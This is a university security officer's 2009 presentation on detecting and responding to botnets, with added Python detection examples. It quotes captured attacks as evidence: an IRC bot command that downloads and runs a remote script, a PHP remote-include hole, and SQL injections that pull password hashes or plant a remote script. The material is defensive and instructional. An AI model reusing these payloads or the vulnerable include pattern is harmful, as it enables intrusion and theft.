Botnet PhD (Piled Higher and Deeper)
Dec 25, 2015
Craig A Schiller, CISSP-ISSMP, ISSAP
Chief Information Security Officer
Portland State University
A Presentation About Botnet Detection
for NWACC 09 Security Workshop
© 2009 Craig A Schiller 2
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
Primary Source
How Do We Detect Them?
Bot life cycle (slide diagram):
1. Computer is exploited, becomes a bot
2. New bot rallies to let the botherder know it's joined the team
3. Retrieve the anti-A/V module
4. Secure the new bot client
5. Retrieve the payload module
6. Listen to the C&C server/peer for commands
7. Execute the commands
8. Report result to the C&C channel
9. On command, erase all evidence and abandon the client
Diagram elements: A/V detection, other bot clients, C&C, download server, possible traffic to victim, user browsing malicious sites
Detection points overlaid on the life cycle:
• Known malware distribution sites
• Known C&C sites
• Security & FW logs
• Abuse@ notices
• User complaint
• Anomalous protocol detection
• Botlike traffic / bad behavior
• Talking to darknet
I checked and I didn’t see anything
How Do We Detect Them?
• A/V, Anti-Spam, Anti-Spyware
  • Host based
  • Enterprise reporting
• User Help Desk tickets
• Abuse notifications
• Quasi-Intelligence Organizations
• Monitoring & Analysis
  • Ourmon
  • Firewall & router logs
  • IDS/IPS – host and network
  • DNS
  • Server & workstation log analysis
  • Malware analysis
  • Forensics
Ourmon
Free network security monitoring tool, with botnet detection capabilities
http://ourmon.cat.pdx.edu/ourmon/index.html
Network Anomaly Detection
• Is it scanning?
• Is it participating in an IRC channel?
• Is there a high control-to-data ratio?
• Is the IRC server/port listed as a known Command & Control server?
• Does the IRC traffic text look botlike?
• Did the host look up or attempt to communicate with a known C&C server?
• Did the host attempt to communicate with an IP address in the darknet?
Network Anomaly Detection
TCP workweight:
ww = (SYNs sent + FINs sent + RESETs returned) / total TCP packets
A measure of signal/noise (control/data). A high number means nearly all control packets (SYN scanner), which basically means the IP is scanning.
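The workweight ratio as an added, runnable example (not Ourmon's code): it tallies the SYN/FIN/RST counters per host over constructed packet summaries and flags the host whose traffic is almost entirely control packets. The 0.9 threshold, the 20-packet minimum and the decision to exclude SYN-ACK replies from "SYNs sent" are assumptions, not values from the slides.

```python
"""TCP workweight, the Ourmon scan heuristic from the slide.

Added example, not Ourmon's code. For each IP it computes
    ww = (SYNs sent + FINs sent + RSTs returned) / total TCP packets
over a constructed list of packet summaries, then flags hosts whose
workweight is high. The 0.9 threshold and the 20-packet minimum are
assumed tuning values, not numbers from the presentation.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class WorkWeight:
    syn_sent: int = 0       # SYNs this host sent (SYN-ACK replies excluded, an assumption)
    fin_sent: int = 0       # FINs this host sent
    rst_returned: int = 0   # RSTs other hosts sent back to this host
    total: int = 0          # every TCP packet this host sent or received

    def value(self) -> float:
        if self.total == 0:
            return 0.0
        return (self.syn_sent + self.fin_sent + self.rst_returned) / self.total


def tcp_workweights(packets):
    """packets: iterable of (src_ip, dst_ip, flags), flags being a set of
    TCP flag names. Returns {ip: WorkWeight}."""
    ww = defaultdict(WorkWeight)
    for src, dst, flags in packets:
        ww[src].total += 1
        ww[dst].total += 1
        if "SYN" in flags and "ACK" not in flags:
            ww[src].syn_sent += 1
        if "FIN" in flags:
            ww[src].fin_sent += 1
        if "RST" in flags:
            # A reset is control traffic "returned" to whoever provoked it,
            # so it is credited to the receiver (the scanner), not the sender.
            ww[dst].rst_returned += 1
    return ww


def flag_scanners(ww, threshold=0.9, min_packets=20):
    """Hosts whose traffic is almost all control packets: SYN scanners."""
    return sorted(ip for ip, w in ww.items()
                  if w.total >= min_packets and w.value() >= threshold)


def sample_traffic():
    """Constructed traffic: one SYN scanner sweeping 50 closed ports and
    one ordinary client holding a data session with a server."""
    scanner, client, server = "10.0.0.5", "10.0.0.7", "10.0.2.2"
    pkts = []
    for i in range(1, 51):
        target = f"10.0.1.{i}"
        pkts.append((scanner, target, {"SYN"}))
        pkts.append((target, scanner, {"RST", "ACK"}))   # port closed
    pkts += [(client, server, {"SYN"}),
             (server, client, {"SYN", "ACK"}),
             (client, server, {"ACK"})]
    pkts += [(client, server, {"PSH", "ACK"})] * 20     # request data
    pkts += [(server, client, {"PSH", "ACK"})] * 20     # response data
    pkts += [(client, server, {"FIN", "ACK"}),
             (server, client, {"FIN", "ACK"}),
             (client, server, {"ACK"})]
    return pkts


if __name__ == "__main__":
    weights = tcp_workweights(sample_traffic())
    top = sorted(weights, key=lambda ip: weights[ip].value(), reverse=True)[:3]
    for ip in top:
        print(f"{ip:12} ww={weights[ip].value():.2f} pkts={weights[ip].total}")
    print("scanners:", flag_scanners(weights))
```

The scanner scores 1.0 (50 SYNs out, 50 RSTs back, nothing else) while the client with a real session stays near 0.04, which is the contrast the slide's "all control" remark describes.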
Network Anomaly Detection
Ourmon does a similar calculation with IRC traffic: a measure of signal/noise (control/data). A high number means non-human communication, which basically means a bot or an application (such as a game).
Recent large DDoS attack
The fundamental pkts graph normally looks like this:
Ouch, ouch, ouch!
That's 869k pps – we have a physical gigabit Ethernet (GE) connection to the Internet …
"Botlike" IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]
"Normal" IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 : OMG, you're just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]
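An added example (not Ourmon's own IRC heuristic) that parses records in the shape of the IRCMSG lines above, extracts the PRIVMSG text and scores it on shell vocabulary, command chaining, URLs, flags and the share of ordinary words. The word list, weights and threshold of 3 are assumptions, and the two records are constructed after the slides with documentation addresses and a placeholder dropper URL.

```python
"""Separating 'botlike' from 'normal' IRC PRIVMSG text, as on the two slides.

Added example, not Ourmon's code. The scoring features, weights and the
threshold of 3 are assumptions; the records are constructed after the
slides (RFC 5737 addresses, placeholder hostmasks and dropper URL).
"""
import re
import string

IRCMSG_RE = re.compile(
    r"s=(?P<src>\S+) -> d=(?P<dst>\S+) dport=(?P<dport>\d+).*?"
    r"channel=(?P<channel>\S+) .*?p=\[(?P<payload>.*)\]$")

SHELL_WORDS = {"curl", "wget", "tftp", "ftp", "perl", "python", "sh", "bash",
               "cmd", "chmod", "rm", "exec", "download", "scan", "ddos"}
BOTLIKE_THRESHOLD = 3   # assumed cut-off

BOTLIKE_RECORD = ("IRC text: IRCMSG: PRIVMSG: s=192.0.2.17 -> d=198.51.100.41 dport=65253 "
                  "sflag=1, channel=priv8 clen=5: p=[:bot!~x@192.0.2.17 PRIVMSG #priv8 "
                  ":fmj curl -o mdbn.gif http://dropper.example.invalid/mdbn.gif;"
                  "perl mdbn.gif;rm -f *.gif*]")
NORMAL_RECORD = ("IRC text: IRCMSG: PRIVMSG: s=192.0.2.17 -> d=198.51.100.41 dport=65253 "
                 "sflag=1, channel=priv8 clen=5: p=[:jill!~j@192.0.2.17 PRIVMSG #priv8 "
                 ": OMG, you're just my BFF Jill! I once had a BFF that was nowhere as "
                 "good a BFF as you.]")


def botlike_score(text):
    """Return (score, reasons) for one PRIVMSG text."""
    tokens = [t for t in re.split(r"[\s;|&]+", text.strip()) if t]
    if not tokens:
        return 0, []
    words = [t.lower().strip(string.punctuation) for t in tokens]
    reasons, score = [], 0
    shell_hits = [w for w in words if w in SHELL_WORDS]
    if shell_hits:                               # one point per shell command word
        score += len(shell_hits)
        reasons.append("shell commands: " + " ".join(shell_hits))
    if re.search(r"[;|&]", text):                # several commands in one line
        score += 1
        reasons.append("command chaining")
    if re.search(r"(?:https?|ftp)://", text):    # something to fetch
        score += 1
        reasons.append("URL")
    if any(len(t) > 1 and t.startswith("-") for t in tokens):
        score += 1
        reasons.append("command-line flags")
    if sum(w.isalpha() for w in words) / len(words) < 0.6:
        score += 1
        reasons.append("few natural-language words")
    return score, reasons


def classify(record):
    """Parse one IRCMSG record and decide whether its text looks botlike."""
    m = IRCMSG_RE.search(record)
    if not m:
        raise ValueError("not an IRCMSG record")
    payload = m.group("payload")
    # The IRC message body follows the first ' :' after the target.
    text = payload.split(" :", 1)[1].strip() if " :" in payload else payload
    score, reasons = botlike_score(text)
    return {"src": m.group("src"), "dst": m.group("dst"),
            "dport": int(m.group("dport")), "channel": m.group("channel"),
            "text": text, "score": score, "reasons": reasons,
            "botlike": score >= BOTLIKE_THRESHOLD}


if __name__ == "__main__":
    for rec in (BOTLIKE_RECORD, NORMAL_RECORD):
        r = classify(rec)
        print(f"#{r['channel']} {r['src']} score={r['score']} botlike={r['botlike']} {r['reasons']}")
```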
Snort signatures
No general purpose intrusion detection.
Limited set of bot-related signatures.
Incident Detection examples
1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka
[**] [1:3111116:1] Mcafee http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80
TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 345145726 2079777105
2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53
UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45
Quasi-Intelligence Organizations
• REN-ISAC
• Shadowserver
• Nanog
• APWG
• Mailing lists
  • Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
  • Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
  • Vendor
• ISC Storm Center
• http://www.emergingthreats.net/
• http://www.malwaredomainlist.com
Lists of Known C&C servers
http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1
http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP
Shadow Server sample (columns: IP Address | Port | Channel | Country | Region | State | Domain | ASN | AS Name | AS Description). The extracted rows interleave two entries each; they are reproduced as recovered, with the two values of a cell separated by " / ":
81.211.7.122 / 69.18.206.194 | 3267 | #B#t[r2]N#t | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
81.211.7.122 / 69.18.206.194 | 3267 | #B#tN#t[r3] | RU / US | MOSCOW / COMMACK | MOSKVA / NEW YORK | GLDN.NET / INVISION.COM | 3216 / 12251 | SOVAM / INVISION | AS Golden Telecom, Moscow, Russia / Invision.com, Inc.
213.234.193.74 / 85.21.82.55 | 6667 | #secured | RU / RU | MOSCOW / MOSCOW | MOSKVA / MOSKVA | NET.RU / - | 39442 / 8402 | UNICO / CORBINA | AS JSC UNICO / AS Corbina Telecom
Quasi-Intelligence Organizations: REN-ISAC
Supported by Indiana University and through relationship with EDUCAUSE and Internet2, the REN-ISAC is an integral part of higher education's strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.
The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs, DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.
Spamhaus DROP List
The Spamhaus Don't Route Or Peer List
DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny subset of the SBL designed for use by firewalls and routing equipment.
DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.
The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or 100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.
When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and DDoS attacks originating on rogue netblocks.
Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.
Spamhaus DROP List excerpt 9/17/09
Malware Domain List
DNS for Botnet Detection
http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html
Database of all lookups for known C&C and known malicious software distribution sites
KnujOn
10 Most Offensive Registrars
• XIN NET (second time at #1)
• eNom
• Network Solutions
• Register.com
• PLANETONLINE
• RegTime
• OnlineNIC
• SpotDomains (domainsite)
• Wild West
• HICHINA Web Solutions
Search Engine Spam & Clicks 4 Hire
Use Google to search for Clicks-4-Hire relays and search engine spam:
site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"
Google site search results
An owned webpage
Browser Intelligence gathering
Links to this web page
Man in the Browser Attack - torpig
Forensics/Intel Gathering
• Quick Forensics
  • Log Analysis
  • Process Explorer
  • TCPView
  • AutoRuns
  • Process Monitor
• Rapier – First Responder Tool
  • Automated forensics
  • Consistent information gathered regardless of who runs it
• Sleuthing
  • How did they get in?
  • What does it do?
  • What files are used?
  • When did what happen?
• Malware Analysis
• More Sleuthing
Log analysis
Forensics/Intel Gathering example
Process Explorer listing (Process | PID | CPU | Description | Company Name):
System Idle Process | 0 | 93.36 | |
Interrupts | n/a | 1.56 | Hardware Interrupts |
DPCs | n/a | | Deferred Procedure Calls |
System | 4 | 0.39 | |
smss.exe | 508 | | Windows NT Session Manager | Microsoft Corporation
csrss.exe | 620 | | Client Server Runtime Process | Microsoft Corporation
winlogon.exe | 884 | | Windows NT Logon Application | Microsoft Corporation
services.exe | 944 | | Services and Controller app | Microsoft Corporation
svchost.exe | 1180 | | Generic Host Process for Win32 Services | Microsoft Corporation
wmiprvse.exe | 3400 | | WMI | Microsoft Corporation
svchost.exe | 1252 | | Generic Host Process for Win32 Services | Microsoft Corporation
svchost.exe | 1312 | | Generic Host Process for |
PSXSS.EXE | 896 | | Interix Subsystem Server | Microsoft Corporation
init | 2156 | | Interix Utility | Microsoft Corporation
inetd | 2432 | | Interix Utility | Microsoft Corporation
iexplorer.exe | 3560 | | |
explorer.exe | 8564 | | Windows Explorer | Microsoft Corporation
ccApp.exe | 9208 | | Symantec User Session | Symantec Corporation
VPTray.exe | 8636 | | Symantec AntiVirus | Symantec Corporation
VPC32.exe | 9524 | | Symantec AntiVirus | Symantec Corporation
iexplorer.exe | 6712 | | |
sqlmangr.exe | 9904 | | SQL Server Service Manager | Microsoft Corporation
Forensics/Intel Gathering example
Strings in the file iexplorer.exe
Strings in memory
Centralized Logging
Diagram elements: NTSyslog, MySQL database server, Internet, log collection, log collection analysis
Workstation Log Analysis
Log Parser
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
A/V Centralized Reporting
Blocked by port blocking rule
3/25/2008 12:56:26 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 202.57.184.145:6666
3/25/2008 6:26:40 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 83.252.58.149:6666
3/25/2008 8:55:30 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/25/2008 11:24:38 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 3:37:41 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 5:07:33 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:23:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 7:38:59 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:54:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 10:40:04 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 10:54:53 AM C:\Program Files\DNA\btdna.exe Prevent mass mailing worms from sending mail 41.220.121.130:25
Use (examine) the central reporting feature of your antivirus server.
A/V Centralized Reporting
5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced) PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\ MediaTubeCodec_ver1.556.0[1].exe
Common Standard Protection: Prevent common programs from running files from the Temp folder Action blocked : Execute
MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.
This appeared in the logs before McAfee could detect this malware.
A/V Centralized Reporting
User defined detection: SPYWARE (Potentially Unwanted Program)
5/12/2008 9:01:50 AM No Action Taken (Delete failed) SYSTEM McShield.exe C:\Documents and Settings\anyman\Desktop\ctfmona.exe
5/12/2008 9:02:31 AM User defined detection : No Action Taken (Clean failed because the detection isn't cleanable) SYSTEM McShield.exe C:\Documents and Settings\anyman\Desktop\ctfmona.exe
What does quarantine or "No Action Taken" mean?
Detectable Behavior
• Multi-homed DNS – FQDN maps to 3 or more IP addresses
  botnet1.example.com pointing to 127.0.0.1
  botnet1.example.com pointing to 127.0.0.2
  botnet1.example.com pointing to 127.0.0.3
  botnet1.example.com pointing to 127.0.0.4
  botnet1.example.com pointing to 127.0.0.5
  botnet1.example.com pointing to 127.0.0.6
• Dynamic DNS used through a commercial site – change IP addresses quickly
• Short DNS TTLs for clients – remap DNS often, check at boot
• Fast-flux DNS – change IP addresses and/or DNS names quickly (for spam, < 5 minutes) and often
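An added example (not from the presentation) that runs the slide's tests over constructed passive-DNS observations: a single answer carrying 3 or more addresses, a TTL at or under 5 minutes, and address churn between successive answers, which together make the fast-flux pattern. The churn rule, and the sample names and addresses other than the slide's botnet1.example.com, are assumptions.

```python
"""Flagging the DNS behaviours listed on the slide: multi-homed names,
short TTLs and fast-flux churn.

Added example, not code from the presentation. It runs over constructed
observations in the shape a passive-DNS collector would record
(timestamp, name, TTL, answer set). The 3-address and 5-minute cut-offs
come from the slide; treating "short TTL plus new addresses on
re-resolution" as fast flux is an assumed heuristic.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    ts: int          # seconds since epoch when the answer was seen
    qname: str
    ttl: int         # TTL of the A records in that answer
    addrs: tuple     # IPv4 addresses returned in that one answer


def analyze(observations, min_addrs=3, max_ttl=300):
    """Return {qname: [flags]} for every name in the observations."""
    by_name = defaultdict(list)
    for o in observations:
        by_name[o.qname].append(o)
    findings = {}
    for name, obs in by_name.items():
        obs.sort(key=lambda o: o.ts)
        flags = []
        # Multi-homed: one answer carries min_addrs or more addresses.
        if max(len(set(o.addrs)) for o in obs) >= min_addrs:
            flags.append("multi-homed")
        # Short TTL: clients are forced to re-resolve within max_ttl seconds.
        if min(o.ttl for o in obs) <= max_ttl:
            flags.append("short-ttl")
        # Churn: addresses present in a later answer but absent from the
        # previous one. Short TTL plus churn is the fast-flux pattern.
        churn = sum(len(set(later.addrs) - set(earlier.addrs))
                    for earlier, later in zip(obs, obs[1:]))
        if "short-ttl" in flags and churn > 0:
            flags.append("fast-flux")
        findings[name] = flags
    return findings


def sample_observations():
    """Constructed data: the slide's botnet1.example.com answer plus a
    stable site, a fast-flux name and a dynamic-DNS name (all made up)."""
    loopbacks = tuple(f"127.0.0.{i}" for i in range(1, 7))
    return [
        Observation(0, "botnet1.example.com", 3600, loopbacks),
        Observation(0, "www.example.com", 86400, ("198.51.100.10", "198.51.100.11")),
        Observation(90000, "www.example.com", 86400, ("198.51.100.10", "198.51.100.11")),
        Observation(0, "flux.example.net", 180, ("203.0.113.10", "203.0.113.20", "203.0.113.30")),
        Observation(200, "flux.example.net", 180, ("203.0.113.30", "203.0.113.40", "203.0.113.50")),
        Observation(400, "flux.example.net", 180, ("203.0.113.50", "203.0.113.60", "203.0.113.70")),
        Observation(0, "dyn.example.org", 60, ("192.0.2.5",)),
        Observation(120, "dyn.example.org", 60, ("192.0.2.77",)),
    ]


if __name__ == "__main__":
    for name, flags in analyze(sample_observations()).items():
        print(f"{name:22} {', '.join(flags) or 'nothing notable'}")
```

Note that a multi-homed answer alone (the slide's 127.0.0.x example) is not the same signal as fast flux: the loopback set never changes and has a long TTL, so only the first flag fires for it.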
Hiding the C&C Server or Phishing Website
The animation on this slide demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
Passive DNS
http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html
Fast Flux DNS example
Internal Intelligence gathering
Rapier – A First Responder Toolkit developed by Steve Mancini, Intel
http://code.google.com/p/rapier/
Malware Hash Registry
http://www.team-cymru.org/Services/MHR/
Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.
Using whois:
$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74
RESPONSE: e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53
Using DNS (dig):
$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT
RESPONSE: "1221154281 53"
The two fields of the response are a Unix time (seconds since midnight 1970-01-01) and the % A/V package detection rate.
Alternate C&C Methods
Echo-Based Botnets
Echo-based means the bot would simply announce its existence to the C&C. There are several ways of doing this with different volumes of data relayed.
• Connect & forget
• File data
• URL data
Command-Based Botnets
• Web GUI based
• Push rather than pull
• P2P
• IM
• Social Networking (MySpace profiles)
• Remote Administration Tools
  • Dameware
  • CarbonCopy
  • Terminal Services
  • PC Anywhere
  • RDP
• Drop zone – FTP is the leading protocol here
  • FTP – phishing C&C regularly reports back (echoes) to an FTP C&C
Incident Response
Required by OUS Information Security policy
PSU Information Security policy requires an Incident Response plan
PSU has several means of discovering incidents
Carsten Willems' CWSandbox
Diagram elements: VMware, XP Pro, Ubuntu
Malware analysis: CWSandbox
<scanner name="AntiVir Workstation" application_version="2.1.9-20" signature_file_version="6.37.0.90">
  <classification>WORM/Rbot.219136.17</classification>
  <additional_info />
</scanner>
<connections_outgoing>
  <connection transportprotocol="TCP" remoteaddr="192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">
    <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245">
      <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" />
      <privmsg_deleted value=":|00||-X-||[email protected] PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." />
    </irc_data>
  </connection>
Analyzing the Malware
CWSandbox Analysis
The Future
Honeypots
Responding to Detection
Botnet Sensors (inputs to the response flow): Security Researcher, Internet, Wormwatch mailing list, McAfee Server, User Reports
Sensor reports:
131.252.x.x NERO says bad
131.252.x.x Acting Bad
131.252.x.x talking to bad
38.100.x.x McAfee says bad
Teams in the flow: Network Team, User Support, Server Support, TAGs, Security Team
Steps in the Network Team / User Support / Server Support / TAGs lanes:
• Create tracking ticket
• Block network access
• Identify location
• Identify computer or user
• Retrieve computer
• Backup all files
• Perform quick forensics
• Re-image computer
• Identify server or webpage owner
• Identify compromised account
• Locate malware
• Determine attack vector
Security Team:
• Locate infected system
• Identify system owner
• Re-image computer
• Identify computer or user
• Review quick forensics
• Perform deep forensics
• Ensure appropriate resources are working the incident
• Identify useful intelligence markers
Blocking Organized Crime supporters
If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.
Use the Spamhaus DROP list to block known evil sites.
Intercage, Inhoster, and Nevacon:
85.255.112.0/20 #SBL36702 (85.255.112.0 - 85.255.127.255)
69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
194.146.204.0/22 #SBL51152 (194.146.204.0 - 194.146.207.255)
Blog that tracks RBN activities:
http://rbnexploit.blogspot.com/
How do they get into user systems?
• Guessing weak passwords / phishing attacks
• Exploiting network vulnerabilities
• Using social engineering
• Using web-based Trojans
  • Trojan websites – game cheats
  • Trojan websites – pornography
• Using email-based Trojans
  • Phishing & pharming
  • Trojan downloads
• Using IM-based Trojans (social engineering)
• Rogue DHCP server serving a malicious DNS server
How do they get into servers? PHP includes
Diagram actors: Attacker, Target.com, Webhost.com
Vulnerable code on Target.com:
<?php include($vuln); ?>
1. Attacker sends GET /a.php?vuln=http://webhost.com/evil.php
2. Target makes a request to webhost.com/evil.php
3. Malware PHP file 'evil.php' is sent to Target.com and is executed by the include() function.
4. The output from evil.php is sent to the Attacker
How do they get into servers? – SQL Injection
--c295b75d-A--
[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3 45819 192.168.22.155 80
--c295b75d-B--
GET /shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.somwhere-in.pdx.edu
Connection: close
--c295b75d-H--
mod-sec
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1212486727810932 339469 (2354 3333 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--c295b75d-Z--
Obfu73ca74ion
Encoded request parameter:
page=-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A
Decoded:
-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
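An added decoding example, not part of the presentation or of ModSecurity: it percent-decodes the parameter and expands the MySQL 0x… hex literal, so that a plain <union select> check, which misses both of the slides' payloads in their raw form, fires on the decoded text. The two payloads are the ones shown on the slides; the helper functions are mine.

```python
"""Undoing the two encoding layers in the slide's obfuscated injection
(percent-encoding plus a MySQL 0x... hex literal) before signature matching.

Added example, not code from the presentation or from ModSecurity. The two
payloads are copied from the slides; the decoder and the minimal
<union select> check are this example's own.
"""
import re
from urllib.parse import unquote_plus

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
UNION_SELECT = re.compile(r"\bunion\s+select\b", re.IGNORECASE)

# Value of page= from the "Obfu73ca74ion" slide.
OBFUSCATED_PAGE = (
    "-1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c"
    "0x3c736372697074207372633d22687474703a2f2f73696d706c652d7464732e"
    "696e666f2f5f392e6a73223e3c2f7363726970743e%2c6%2F%2A"
)
# Value of cat= from the slide's mod_security audit log.
PLAIN_CAT = ("999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,"
             "CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*")


def deobfuscate(value: str) -> str:
    """Percent-decode ('+' becomes a space too), then expand 0x.. hex literals.

    Order matters: decoding first also catches a '0x' that was itself
    percent-encoded. Odd-length hex runs are not valid byte strings and are
    left untouched.
    """
    text = unquote_plus(value)

    def expand(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")

    return HEX_LITERAL.sub(expand, text)


def decoded_args(query_string: str) -> dict:
    """Split a raw query string and decode every value the same way."""
    out = {}
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        out[unquote_plus(name)] = deobfuscate(value)
    return out


def union_select_match(value: str) -> dict:
    """Compare a naive match on the raw value with one on the decoded value."""
    decoded = deobfuscate(value)
    return {"raw": UNION_SELECT.search(value) is not None,
            "decoded": UNION_SELECT.search(decoded) is not None,
            "decoded_value": decoded}


if __name__ == "__main__":
    for label, payload in (("page", OBFUSCATED_PAGE), ("cat", PLAIN_CAT)):
        r = union_select_match(payload)
        print(f"{label}: raw match={r['raw']} decoded match={r['decoded']}")
        print("   ", r["decoded_value"])
```

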